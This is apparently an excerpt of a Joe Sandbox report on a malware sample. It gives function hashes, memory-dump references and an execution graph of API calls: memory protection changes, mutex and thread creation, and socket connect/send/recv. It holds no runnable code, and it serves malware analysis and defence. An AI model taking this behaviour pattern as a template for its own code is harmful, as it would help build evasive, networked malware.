                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                      • Opcode ID: b5669050a17523ea482a3541c80d499f0ddee4cd1f7c3721a6ed9b09f8b682b4
                                                                                                                                      • Instruction ID: d6bbbf3e1e54014336ce74210c7a56325d59d89c89bb62f44fbd1d9f465087d9
                                                                                                                                      • Opcode Fuzzy Hash: b5669050a17523ea482a3541c80d499f0ddee4cd1f7c3721a6ed9b09f8b682b4
                                                                                                                                      • Instruction Fuzzy Hash: 6B411D76A00312CFDB00CF58C881A0277E9EF4969CF05069DECDAB7225D7B8D880CB99
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: Wow64 Emulation Layer
                                                                                                                                      • API String ID: 3446177414-921169906
                                                                                                                                      • Opcode ID: 7d3ecb1305bd98427ad94e4f2dab85b862ebe48e069a89f184f47ee8b0e1ce50
                                                                                                                                      • Instruction ID: 15524c96f5aa71bd5d0c21ae0a497b29b390e7ca9b03fc6719f1e2852b85df11
                                                                                                                                      • Opcode Fuzzy Hash: 7d3ecb1305bd98427ad94e4f2dab85b862ebe48e069a89f184f47ee8b0e1ce50
                                                                                                                                      • Instruction Fuzzy Hash: 1521477690055EBFAF019AA0CD88CFFBB7DEF45299B040154FA16B2104E734DE42EB64
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 526c64e954d0f0af7c7fded82fc49164c7e777c54e996c7a27007a95506472c3
                                                                                                                                      • Instruction ID: 16448834b67110f5089952b0850e513e87795e395bb5ec3408b6fb9d27ddb687
                                                                                                                                      • Opcode Fuzzy Hash: 526c64e954d0f0af7c7fded82fc49164c7e777c54e996c7a27007a95506472c3
                                                                                                                                      • Instruction Fuzzy Hash: 6DE1DC74E00709CFEB25CFA9C984A9DBBF6FB48310F11852AE555B7264DBB1A881CF10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 76b51d963e76a84d3595092a02404b212d7f1551aabcdf7f5d74ec5ada8c1725
                                                                                                                                      • Instruction ID: f5051a9638807413e2a3675f6353b0ac6a5a41ca5ed438806e5f27fa2a058d1c
                                                                                                                                      • Opcode Fuzzy Hash: 76b51d963e76a84d3595092a02404b212d7f1551aabcdf7f5d74ec5ada8c1725
                                                                                                                                      • Instruction Fuzzy Hash: 0E713471E112299FDF00CFA8C884A9DBBB9FF48351F1540AAE905FB264E734A905CF58
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 3e4a1b95b06591e27445412a517f7d816a88c314f7053dded2cc44904e9be388
                                                                                                                                      • Instruction ID: 3996cb06c2f54c0c0e01b4e07db561fc69f4063f7958404409b112fda758d71b
                                                                                                                                      • Opcode Fuzzy Hash: 3e4a1b95b06591e27445412a517f7d816a88c314f7053dded2cc44904e9be388
                                                                                                                                      • Instruction Fuzzy Hash: 92518E74B20A139FEF08CE18D890A19BBE6FB89390F12446DD956E7710DB71EC41CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                      • Opcode ID: 4b512e9eef5da1e65d45333cd54d55c6d4bfca07265f06e1719b6ad63a87c351
                                                                                                                                      • Instruction ID: c9413c6aca461300be6ec82c81d491af878ed822e104fa3811f821ae06f65175
                                                                                                                                      • Opcode Fuzzy Hash: 4b512e9eef5da1e65d45333cd54d55c6d4bfca07265f06e1719b6ad63a87c351
                                                                                                                                      • Instruction Fuzzy Hash: B75111B6E102199FDB04CF99C844ADDFBB6FF48360F15806AE815BB260DB749901CF58
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4281723722-0
                                                                                                                                      • Opcode ID: 7ee4b354ca6cdbca28b4e0a793ab07f499688348a41407aa323714dab4d4ce39
                                                                                                                                      • Instruction ID: 5813b98589b04e3ed88d843ecce0f06b3fca9f34928725640c0b378ade4c51e7
                                                                                                                                      • Opcode Fuzzy Hash: 7ee4b354ca6cdbca28b4e0a793ab07f499688348a41407aa323714dab4d4ce39
                                                                                                                                      • Instruction Fuzzy Hash: 30313475E01219DFDF05DFA9D888A9EBBF1FB48320F10416AE921B72A0CB359901CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                      • Opcode ID: ae34705824d762a5bee9cc6904c967013fc3608854809e62b1c1f5cb05e8f60d
                                                                                                                                      • Instruction ID: 182b8af700ead6c9a16ef192e1bfb925bdcb38cf868b13c8c5d6571d791814b9
                                                                                                                                      • Opcode Fuzzy Hash: ae34705824d762a5bee9cc6904c967013fc3608854809e62b1c1f5cb05e8f60d
                                                                                                                                      • Instruction Fuzzy Hash: A1327978E00B29CFEB65CFA4C884BE9BBB5BB08304F4041E9D549A7241DB749AC4DF91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: HEAP: ${(4
                                                                                                                                      • API String ID: 0-698600493
                                                                                                                                      • Opcode ID: d04d152e2da46677679f14399e30e95e1a61eac42914de5f80c1b04d433afd35
                                                                                                                                      • Instruction ID: 7964c9b8428eff54f4a02a1db14dc743f09477120b9fbce20553e396b8ea5686
                                                                                                                                      • Opcode Fuzzy Hash: d04d152e2da46677679f14399e30e95e1a61eac42914de5f80c1b04d433afd35
                                                                                                                                      • Instruction Fuzzy Hash: EBB18B71A093419FD720CF28C880A1FBBE5BF94754F904A2EF994EB295D770D904CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0$Flst
                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                      • Opcode ID: ee57f6be8b3bb470b9277bdbb3a5a8cf834d786f3a5687ff5c44822664bf4ba0
                                                                                                                                      • Instruction ID: 162910ff9da5f051000e2a2615b3e11b1480a41879c8830504829abec05cadec
                                                                                                                                      • Opcode Fuzzy Hash: ee57f6be8b3bb470b9277bdbb3a5a8cf834d786f3a5687ff5c44822664bf4ba0
                                                                                                                                      • Instruction Fuzzy Hash: BB518BB5E01289CFEB14CF99C884B99FBF5EF44795F14826ED049BB250EB709985CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                      • String ID: 0$0
                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                      • Opcode ID: 84c71acd0d52ff54f18b0db0e9b3fae4b4193fb49e35defb9b489d7dd9db66db
                                                                                                                                      • Instruction ID: 6890e2a65bd086bc03fc8f016b0d725c27fb8ab2bdf658f65544089a61074383
                                                                                                                                      • Opcode Fuzzy Hash: 84c71acd0d52ff54f18b0db0e9b3fae4b4193fb49e35defb9b489d7dd9db66db
                                                                                                                                      • Instruction Fuzzy Hash: C6415DF5A08B01DFD300CF28C484A5ABBE5BB89354F444A6EF588DB340D771EA06CB96
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:2.3%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:4.7%
                                                                                                                                      Total number of Nodes:446
                                                                                                                                      Total number of Limit Nodes:16
                                                                                                                                      execution_graph 13489 a72f232 13490 a72f25c 13489->13490 13492 a72f334 13489->13492 13491 a72f410 NtCreateFile 13490->13491 13490->13492 13491->13492 13959 a7319b3 13960 a7319bd 13959->13960 13963 a7266d2 13960->13963 13962 a7319e0 13964 a7266f7 13963->13964 13965 a726704 13963->13965 13966 a7240f2 6 API calls 13964->13966 13967 a7266ff 13965->13967 13968 a72672d 13965->13968 13970 a726737 13965->13970 13966->13967 13967->13962 13972 a72c2c2 13968->13972 13970->13967 13971 a72ff82 6 API calls 13970->13971 13971->13967 13973 a72c2cb 13972->13973 13974 a72c2df 13972->13974 13973->13974 13975 a72c0c2 6 API calls 13973->13975 13974->13967 13975->13974 13939 a7319f1 13940 a7319f7 13939->13940 13943 a726852 13940->13943 13942 a731a0f 13944 a7268e4 13943->13944 13945 a726865 13943->13945 13944->13942 13945->13944 13947 a726887 13945->13947 13949 a72687e 13945->13949 13946 a72c36f 13946->13942 13947->13944 13948 a72a662 6 API calls 13947->13948 13948->13944 13949->13946 13950 a72c0c2 6 API calls 13949->13950 13950->13946 13808 a7240f1 13809 a724109 13808->13809 13810 a7241d3 13808->13810 13811 a724012 6 API calls 13809->13811 13812 a724113 13811->13812 13812->13810 13813 a72ff82 6 API calls 13812->13813 13813->13810 13951 a7255f1 13952 a725606 13951->13952 13953 a72560e 13951->13953 13954 a72a662 6 API calls 13952->13954 13954->13953 13814 a7282f4 13817 a728349 13814->13817 13815 a7284c3 13822 a7248f2 NtProtectVirtualMemory 13815->13822 13823 a728597 13815->13823 13816 a72849f 13816->13815 13818 a7248f2 NtProtectVirtualMemory 13816->13818 13817->13816 13819 a7248f2 NtProtectVirtualMemory 13817->13819 13818->13815 13820 a728480 13819->13820 13821 a7248f2 NtProtectVirtualMemory 13820->13821 13821->13816 13822->13823 13824 a7248f2 NtProtectVirtualMemory 13823->13824 13825 a7285bf 13823->13825 13824->13825 13828 a7248f2 NtProtectVirtualMemory 13825->13828 13829 a7286b9 13825->13829 13826 a7286e1 13827 a72b382 ObtainUserAgentString 13826->13827 13830 a7286e9 13827->13830 13828->13829 13829->13826 13831 a7248f2 NtProtectVirtualMemory 13829->13831 13831->13826 13772 a72e83a 13773 a72e841 13772->13773 13774 a72ff82 6 API calls 13773->13774 13776 a72e8c5 13774->13776 13775 a72e906 13776->13775 13777 a72f232 NtCreateFile 13776->13777 13777->13775 13900 a72ff7a 13901 a72ffb8 13900->13901 13902 a72c5b2 socket 13901->13902 13903 a730081 13901->13903 13909 a730022 13901->13909 13902->13903 13904 a730134 13903->13904 13906 a730117 getaddrinfo 13903->13906 13903->13909 13905 a72c732 connect 13904->13905 13908 a7301b2 13904->13908 13904->13909 13905->13908 13906->13904 13907 a72c6b2 send 13910 a730729 13907->13910 13908->13907 13908->13909 13910->13909 13911 a7307f4 setsockopt recv 13910->13911 13911->13909 13832 a7280fb 13834 a728137 13832->13834 13833 a7282d5 13834->13833 13835 a7248f2 NtProtectVirtualMemory 13834->13835 13836 a72828a 13835->13836 13837 a7248f2 NtProtectVirtualMemory 13836->13837 13840 a7282a9 13837->13840 13838 a7282cd 13839 a72b382 ObtainUserAgentString 13838->13839 13839->13833 13840->13838 13841 a7248f2 NtProtectVirtualMemory 13840->13841 13841->13838 13884 a72c0b9 13885 a72c0ed 13884->13885 13887 a72c1f0 13884->13887 13886 a72ff82 6 API calls 13885->13886 13885->13887 13886->13887 13888 a72a8be 13890 a72a8c3 13888->13890 13889 a72a9a6 13890->13889 13891 a72a995 ObtainUserAgentString 13890->13891 13891->13889 13976 a727fbf 13979 a728016 13976->13979 13977 a7280e8 13978 a72b382 ObtainUserAgentString 13977->13978 13980 a7280f0 13978->13980 13979->13980 13981 a7248f2 NtProtectVirtualMemory 13979->13981 13982 a7280bb 13979->13982 13981->13982 13982->13977 13983 a7248f2 NtProtectVirtualMemory 13982->13983 13983->13977 13842 a729ce2 13844 a729dd9 13842->13844 13843 a72a022 13844->13843 13848 a729352 13844->13848 13846 a729f0d 13846->13843 13857 a729792 13846->13857 13849 a72939e 13848->13849 13850 a729595 13849->13850 13851 a7294ec 13849->13851 13856 a72958e 13849->13856 13853 a72f232 NtCreateFile 13850->13853 13850->13856 13852 a72f232 NtCreateFile 13851->13852 13854 a7294ff 13852->13854 13853->13856 13855 a72f232 NtCreateFile 13854->13855 13854->13856 13855->13856 13856->13846 13858 a7297e0 13857->13858 13859 a72f232 NtCreateFile 13858->13859 13861 a72990c 13859->13861 13860 a729af3 13860->13846 13861->13860 13862 a729352 NtCreateFile 13861->13862 13863 a729602 NtCreateFile 13861->13863 13862->13861 13863->13861 13916 a726b66 13918 a726b6a 13916->13918 13917 a726cce 13918->13917 13919 a726cb5 CreateMutexW 13918->13919 13919->13917 13864 a72c2e4 13865 a72c36f 13864->13865 13866 a72c305 13864->13866 13866->13865 13868 a72c0c2 13866->13868 13869 a72c0cb 13868->13869 13871 a72c1f0 13868->13871 13870 a72ff82 6 API calls 13869->13870 13869->13871 13870->13871 13871->13865 13778 a72b22a 13779 a72b25e 13778->13779 13780 a72a8c2 ObtainUserAgentString 13779->13780 13781 a72b26b 13780->13781 13892 a731aa9 13893 a731aaf 13892->13893 13896 a72c212 13893->13896 13895 a731ac7 13897 a72c237 13896->13897 13898 a72c21b 13896->13898 13897->13895 13898->13897 13899 a72c0c2 6 API calls 13898->13899 13899->13897 13782 a72542e 13783 a72545b 13782->13783 13791 a7254c9 13782->13791 13784 a72f232 NtCreateFile 13783->13784 13783->13791 13785 a725496 13784->13785 13786 a7254c5 13785->13786 13788 a725082 NtCreateFile 13785->13788 13787 a72f232 NtCreateFile 13786->13787 13786->13791 13787->13791 13789 a7254b6 13788->13789 13789->13786 13790 a724f52 NtCreateFile 13789->13790 13790->13786 13936 a72c72e 13937 a72c76a 13936->13937 13938 a72c788 connect 13936->13938 13937->13938 13606 a730bac 13607 a730bb1 13606->13607 13640 a730bb6 13607->13640 13641 a726b72 13607->13641 13609 a730c2c 13610 a730c85 13609->13610 13612 a730c54 13609->13612 13613 a730c69 13609->13613 13609->13640 13611 a72eab2 NtProtectVirtualMemory 13610->13611 13614 a730c8d 13611->13614 13615 a72eab2 NtProtectVirtualMemory 13612->13615 13616 a730c80 13613->13616 13617 a730c6e 13613->13617 13678 a728102 13614->13678 13620 a730c5c 13615->13620 13616->13610 13618 a730c97 13616->13618 13621 a72eab2 NtProtectVirtualMemory 13617->13621 13622 a730cbe 13618->13622 13623 a730c9c 13618->13623 13664 a727ee2 13620->13664 13625 a730c76 13621->13625 13627 a730cc7 13622->13627 13628 a730cd9 13622->13628 13622->13640 13645 a72eab2 13623->13645 13670 a727fc2 13625->13670 13629 a72eab2 NtProtectVirtualMemory 13627->13629 13632 a72eab2 NtProtectVirtualMemory 13628->13632 13628->13640 13631 a730ccf 13629->13631 13688 a7282f2 13631->13688 13635 a730ce5 13632->13635 13633 a730cac 13656 a727de2 13633->13656 13706 a728712 13635->13706 13643 a726b93 13641->13643 13642 a726cce 13642->13609 13643->13642 13644 a726cb5 CreateMutexW 13643->13644 13644->13642 13647 a72eadf 13645->13647 13646 a72eef1 13646->13633 13647->13646 13648 a72eebc 13647->13648 13718 a7248f2 13647->13718 13648->13633 13650 a72ee5c 13651 a7248f2 NtProtectVirtualMemory 13650->13651 13652 a72ee7c 13651->13652 13653 a7248f2 NtProtectVirtualMemory 13652->13653 13654 a72ee9c 13653->13654 13655 a7248f2 NtProtectVirtualMemory 13654->13655 13655->13648 13658 a727df0 13656->13658 13657 a727ecd 13660 a724412 13657->13660 13658->13657 13741 a72b382 13658->13741 13662 a724440 13660->13662 13661 a724473 13661->13640 13662->13661 13663 a72444d CreateThread 13662->13663 13663->13640 13666 a727f06 13664->13666 13665 a727fa4 13665->13640 13666->13665 13667 a7248f2 NtProtectVirtualMemory 13666->13667 13668 a727f9c 13667->13668 13669 a72b382 ObtainUserAgentString 13668->13669 13669->13665 13671 a728016 13670->13671 13674 a7280bb 13671->13674 13675 a7280f0 13671->13675 13676 a7248f2 NtProtectVirtualMemory 13671->13676 13672 a7280e8 13673 a72b382 ObtainUserAgentString 13672->13673 13673->13675 13674->13672 13677 a7248f2 NtProtectVirtualMemory 13674->13677 13675->13640 13676->13674 13677->13672 13680 a728137 13678->13680 13679 a7282d5 13679->13640 13680->13679 13681 a7248f2 NtProtectVirtualMemory 13680->13681 13682 a72828a 13681->13682 13683 a7248f2 NtProtectVirtualMemory 13682->13683 13686 a7282a9 13683->13686 13684 a7282cd 13685 a72b382 ObtainUserAgentString 13684->13685 13685->13679 13686->13684 13687 a7248f2 NtProtectVirtualMemory 13686->13687 13687->13684 13689 a728349 13688->13689 13690 a72849f 13689->13690 13692 a7248f2 NtProtectVirtualMemory 13689->13692 13691 a7248f2 NtProtectVirtualMemory 13690->13691 13695 a7284c3 13690->13695 13691->13695 13693 a728480 13692->13693 13694 a7248f2 NtProtectVirtualMemory 13693->13694 13694->13690 13696 a7248f2 NtProtectVirtualMemory 13695->13696 13697 a728597 13695->13697 13696->13697 13698 a7248f2 NtProtectVirtualMemory 13697->13698 13699 a7285bf 13697->13699 13698->13699 13702 a7248f2 NtProtectVirtualMemory 13699->13702 13703 a7286b9 13699->13703 13700 a7286e1 13701 a72b382 ObtainUserAgentString 13700->13701 13704 a7286e9 13701->13704 13702->13703 13703->13700 13705 a7248f2 NtProtectVirtualMemory 13703->13705 13704->13640 13705->13700 13707 a728767 13706->13707 13708 a7248f2 NtProtectVirtualMemory 13707->13708 13711 a728903 13707->13711 13709 a7288e3 13708->13709 13710 a7248f2 NtProtectVirtualMemory 13709->13710 13710->13711 13714 a728992 13711->13714 13716 a7248f2 NtProtectVirtualMemory 13711->13716 13712 a7289b7 13713 a72b382 ObtainUserAgentString 13712->13713 13715 a7289bf 13713->13715 13714->13712 13717 a7248f2 NtProtectVirtualMemory 13714->13717 13715->13640 13716->13714 13717->13712 13719 a724987 13718->13719 13724 a7249b2 13719->13724 13733 a725622 13719->13733 13721 a724c0c 13721->13650 13722 a724ba2 13723 a730e12 NtProtectVirtualMemory 13722->13723 13732 a724b5b 13723->13732 13724->13721 13724->13722 13725 a724ac5 13724->13725 13737 a730e12 13725->13737 13727 a730e12 NtProtectVirtualMemory 13727->13721 13728 a724ae3 13728->13721 13729 a724b3d 13728->13729 13730 a730e12 NtProtectVirtualMemory 13728->13730 13731 a730e12 NtProtectVirtualMemory 13729->13731 13730->13729 13731->13732 13732->13721 13732->13727 13735 a72567a 13733->13735 13734 a72567e 13734->13724 13735->13734 13736 a730e12 NtProtectVirtualMemory 13735->13736 13736->13735 13738 a72f942 13737->13738 13739 a730e45 NtProtectVirtualMemory 13738->13739 13740 a730e70 13739->13740 13740->13728 13742 a72b3c7 13741->13742 13745 a72b232 13742->13745 13744 a72b438 13744->13657 13746 a72b25e 13745->13746 13749 a72a8c2 13746->13749 13748 a72b26b 13748->13744 13751 a72a934 13749->13751 13750 a72a9a6 13750->13748 13751->13750 13752 a72a995 ObtainUserAgentString 13751->13752 13752->13750 13518 a730e12 13522 a72f942 13518->13522 13520 a730e45 NtProtectVirtualMemory 13521 a730e70 13520->13521 13523 a72f967 13522->13523 13523->13520 13792 a725613 13794 a725620 13792->13794 13793 a72567e 13794->13793 13795 a730e12 NtProtectVirtualMemory 13794->13795 13795->13794 13872 a729cd4 13874 a729cd8 13872->13874 13873 a72a022 13874->13873 13875 a729352 NtCreateFile 13874->13875 13876 a729f0d 13875->13876 13876->13873 13877 a729792 NtCreateFile 13876->13877 13877->13876 13955 a727dd9 13956 a727df0 13955->13956 13957 a72b382 ObtainUserAgentString 13956->13957 13958 a727ecd 13956->13958 13957->13958 13796 a731a1f 13797 a731a25 13796->13797 13800 a7255f2 13797->13800 13799 a731a3d 13801 a7255fb 13800->13801 13802 a72560e 13800->13802 13801->13802 13803 a72a662 6 API calls 13801->13803 13802->13799 13803->13802 13524 a7242dd 13527 a72431a 13524->13527 13525 a7243fa 13526 a724328 SleepEx 13526->13526 13526->13527 13527->13525 13527->13526 13531 a72ef12 13527->13531 13540 a725432 13527->13540 13550 a7240f2 13527->13550 13539 a72ef48 13531->13539 13532 a72f134 13532->13527 13533 a72f0e9 13535 a72f125 13533->13535 13568 a72e842 13533->13568 13576 a72e922 13535->13576 13537 a72f232 NtCreateFile 13537->13539 13539->13532 13539->13533 13539->13537 13556 a72ff82 13539->13556 13541 a72545b 13540->13541 13549 a7254c9 13540->13549 13542 a72f232 NtCreateFile 13541->13542 13541->13549 13543 a725496 13542->13543 13544 a7254c5 13543->13544 13588 a725082 13543->13588 13545 a72f232 NtCreateFile 13544->13545 13544->13549 13545->13549 13547 a7254b6 13547->13544 13597 a724f52 13547->13597 13549->13527 13551 a724109 13550->13551 13553 a7241d3 13550->13553 13602 a724012 13551->13602 13553->13527 13554 a724113 13554->13553 13555 a72ff82 6 API calls 13554->13555 13555->13553 13557 a72ffb8 13556->13557 13558 a72c5b2 socket 13557->13558 13559 a730081 13557->13559 13567 a730022 13557->13567 13558->13559 13560 a730134 13559->13560 13562 a730117 getaddrinfo 13559->13562 13559->13567 13561 a72c732 connect 13560->13561 13566 a7301b2 13560->13566 13560->13567 13561->13566 13562->13560 13563 a72c6b2 send 13565 a730729 13563->13565 13564 a7307f4 setsockopt recv 13564->13567 13565->13564 13565->13567 13566->13563 13566->13567 13567->13539 13569 a72e86d 13568->13569 13584 a72f232 13569->13584 13571 a72e906 13571->13533 13572 a72e888 13572->13571 13573 a72e8c5 13572->13573 13574 a72ff82 6 API calls 13572->13574 13573->13571 13575 a72f232 NtCreateFile 13573->13575 13574->13573 13575->13571 13577 a72e9c2 13576->13577 13578 a72f232 NtCreateFile 13577->13578 13580 a72e9d6 13578->13580 13579 a72ea9f 13579->13532 13580->13579 13581 a72ea5d 13580->13581 13583 a72ff82 6 API calls 13580->13583 13581->13579 13582 a72f232 NtCreateFile 13581->13582 13582->13579 13583->13581 13585 a72f25c 13584->13585 13587 a72f334 13584->13587 13586 a72f410 NtCreateFile 13585->13586 13585->13587 13586->13587 13587->13572 13589 a725420 13588->13589 13590 a7250aa 13588->13590 13589->13547 13590->13589 13591 a72f232 NtCreateFile 13590->13591 13593 a7251f9 13591->13593 13592 a7253df 13592->13547 13593->13592 13594 a72f232 NtCreateFile 13593->13594 13595 a7253c9 13594->13595 13596 a72f232 NtCreateFile 13595->13596 13596->13592 13598 a724f70 13597->13598 13599 a724f84 13597->13599 13598->13544 13600 a72f232 NtCreateFile 13599->13600 13601 a725046 13600->13601 13601->13544 13604 a724031 13602->13604 13603 a7240cd 13603->13554 13604->13603 13605 a72ff82 6 API calls 13604->13605 13605->13603 13878 a727edd 13880 a727f06 13878->13880 13879 a727fa4 13880->13879 13881 a7248f2 NtProtectVirtualMemory 13880->13881 13882 a727f9c 13881->13882 13883 a72b382 ObtainUserAgentString 13882->13883 13883->13879 13493 a72ff82 13494 a72ffb8 13493->13494 13496 a730081 13494->13496 13504 a730022 13494->13504 13505 a72c5b2 13494->13505 13497 a730134 13496->13497 13499 a730117 getaddrinfo 13496->13499 13496->13504 13503 a7301b2 13497->13503 13497->13504 13508 a72c732 13497->13508 13499->13497 13501 